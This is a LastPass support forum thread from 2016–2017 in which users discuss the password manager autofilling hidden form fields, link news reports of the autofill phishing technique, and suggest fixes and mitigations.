Lastpass Autofill Phishing Attack

Have questions about LastPass, or having problems using it? Ask for help here!

Moderators: admin, anatoly_LP, chantieLP, Israel, JoeSiegrist, robyn

auto-filling hidden fields

Postby 10sTroy » Wed Jan 06, 2016 1:32 pm

So, in the following, in the words of the great Strother Martin "What we've got here is failure to communicate.". The following is a dialog with Lastpass about their filling "hidden" fields on a page.

2016-01-05 20:40
Dmitrij https://yoast.com/research/autocompletetype.php doesn't have any 'potentially insecure' forms like mentioned in the FAQ.

If you check page source you can see all of the form fields - view-source:https://yoast.com/research/autocompletetype.php , they aren't really 'hidden', they are just not visible to a human eye, submit button just visually reveals this form fields, they are not hidden in any form, they aren't just visible to users based on the page design.

So there is really nothing to worry about when it comes to using form fields with LastPass.
2016-01-05 19:33
You Thank you for the prompt response. I checked and I do have the "warn before filling insecure..." checked. So when you say "it's expected that the software will try to match all possible form fields.", does that include hidden fields if they are seen as "secure"?
2016-01-05 18:53
Dmitrij Hello,

You are manually submitting your form fills profile, so it's expected that the software will try to match all possible form fields.

However, insecure form fields will not be auto-fill by default and you will see a warning message on such pages unless you have disabled the following security feature:

https://lastpass.com/support.php?cmd=showfaq&id=7336

Kind regards,
Dmitrij
2016-01-05 16:26
You
lastpass f... (691.9 KB) Lastpass fills hidden fields in a page. I hope that it does not do that with credit card info, but in any case, I don't want anything filled that I am not aware of like my address. Please fix. Thanks, Troy

By the way, I LOVE the problem steps recorder that you recommended. See attached.
10sTroy
 
Posts: 2
Joined: Sat Oct 17, 2015 5:42 pm

Lastpass Autofill Phishing Attack

Postby sydlexius » Mon Jan 09, 2017 7:36 pm

With credit to Viljami Kuosmanen, I can confirm that Lastpass 4.1.32a (via Firefox nightly) will fill in hidden fields, allowing a malicious site to obtain more information than intended. Example code here, and demo here.
sydlexius
 
Posts: 8
Joined: Wed Apr 11, 2012 7:04 pm

Re: Lastpass Autofill Phishing Attack

Postby mhast123 » Tue Jan 10, 2017 8:57 am

Guardian have picked it up. Wonder if LP will pay some attention now:
https://www.theguardian.com/technology/ ... are_btn_tw
mhast123
 
Posts: 1
Joined: Tue Jan 10, 2017 8:56 am

Re: Lastpass Autofill Phishing Attack

Postby WhoKnowsMe73 » Tue Jan 10, 2017 9:11 am

This is now being reported as a vulnerability on the register website. Would be reassuring to see a LastPass response/fix?

http://www.theregister.co.uk/2017/01/10 ... ari_crims/
WhoKnowsMe73
 
Posts: 2
Joined: Tue Jun 23, 2015 4:41 pm

Browser autofill used to steal personal details

Postby Andy433 » Tue Jan 10, 2017 12:42 pm

Browser autofill used to steal personal details in new phishing attack
https://www.theguardian.com/technology/ ... ?CMP=fb_gu

Are you aware of that risk and is Lastpass working on a solution?
Andy433
 
Posts: 2
Joined: Mon Feb 15, 2016 5:48 pm

Re: Browser autofill used to steal personal details

Postby peteskitoo105 » Tue Jan 10, 2017 1:33 pm

I have the same question, I tested the phishing test site and LastPass will indeed ask to fill in credit card information even if I hadn't told LastPass to do that:
https://anttiviljami.github.io/browser- ... -phishing/
I am very concerned about using a feature that can get more data out of me than I am expecting of course.
peteskitoo105
 
Posts: 3
Joined: Thu Apr 21, 2016 1:44 pm

Re: Lastpass Autofill Phishing Attack

Postby tomLP » Tue Jan 10, 2017 3:20 pm

Please see our FAQ documentation regarding this matter here https://lastpass.com/support.php?cmd=showfaq&id=11012
tomLP
 
Posts: 23
Joined: Thu Dec 11, 2014 5:22 pm

Re: Lastpass Autofill Phishing Attack

Postby sydlexius » Tue Jan 10, 2017 3:34 pm

While Autofill may be an optional feature, there must have been a reason why Marvasol decided it was worth the cost and effort to duplicate a feature found in many of the browsers that you've developed the extension for. Indeed it's valued enough to add features such as credit monitoring. Many of the steps discussed in the FAQ are onerous for a layperson. Further, the vaguely-worded "potentially insecure" prompt doesn't even come up in one of the aforementioned test sites.

Most of the discussions I've seen at large have suggestions such as adding "summary" screen that pops up when you select an autofill option that shows you which fields are being filled, and perhaps even offers a checkbox that allows for you to deselect individual items. Obviously that requires further development and testing of your product, which may prove to be a duplication of the major browser ISVs' efforts.
sydlexius
 
Posts: 8
Joined: Wed Apr 11, 2012 7:04 pm

Re: Lastpass Autofill Phishing Attack

Postby peteskitoo105 » Tue Jan 10, 2017 7:21 pm

tomLP Wrote:Please see our FAQ documentation regarding this matter here https://lastpass.com/support.php?cmd=showfaq&id=11012


Thank you this was useful.
One thing I noticed however with the phishing attack sample site https://anttiviljami.github.io/browser- ... -phishing/ is that my default form with basic information DOES NOT have my credit card information, I use a second form fill for that, but when I fill this form with the non-credit card info, it still asks if I want to fill the credit card info. Will this just use the empty fields from the first form fill?
One way to help address this is to prompt the user for exactly what information and fields is going to be submitted to the website in up pop-up prompt and letting the user see for themselves, at least if there was more information than expected being given up, that would help the end-user determine that.
peteskitoo105
 
Posts: 3
Joined: Thu Apr 21, 2016 1:44 pm

Browser autofill used to steal personal details in new phish

Postby westcoastsurf » Tue Jan 10, 2017 8:47 pm

Chrome, Safari, Opera and extensions such as LastPass can be tricked into leaking private information using hidden text boxes, developer finds

https://www.theguardian.com/technology/ ... ome-safari

Finnish web developer and hacker Viljami Kuosmanen discovered that several web browsers, including Google’s Chrome, Apple’s Safari and Opera, as well as some plugins and utilities such as LastPass, can be tricked into giving away a user’s personal information through their profile-based autofill systems

Users can protect themselves from this kind of phishing attack by disabling the autofill system within their browser or extension settings.


https://helpdesk.lastpass.com/extension-preferences/#h2 (general tab)

Automatically Fill Login Information: This default setting instructs LastPass to autopopulate any stored login fields (such as username and password) when you navigate to a stored URL.

How to change this:

Right click the Latpass plugin icon in your top browser, select options, uncheck "Automatically Fill Login Information"
westcoastsurf
 
Posts: 1
Joined: Tue Jan 10, 2017 8:27 pm

Next

Return to General Support & Troubleshooting

Who is online

Users browsing this forum: Bing [Bot], lhmsau820, Yahoo [Bot] and 29 guests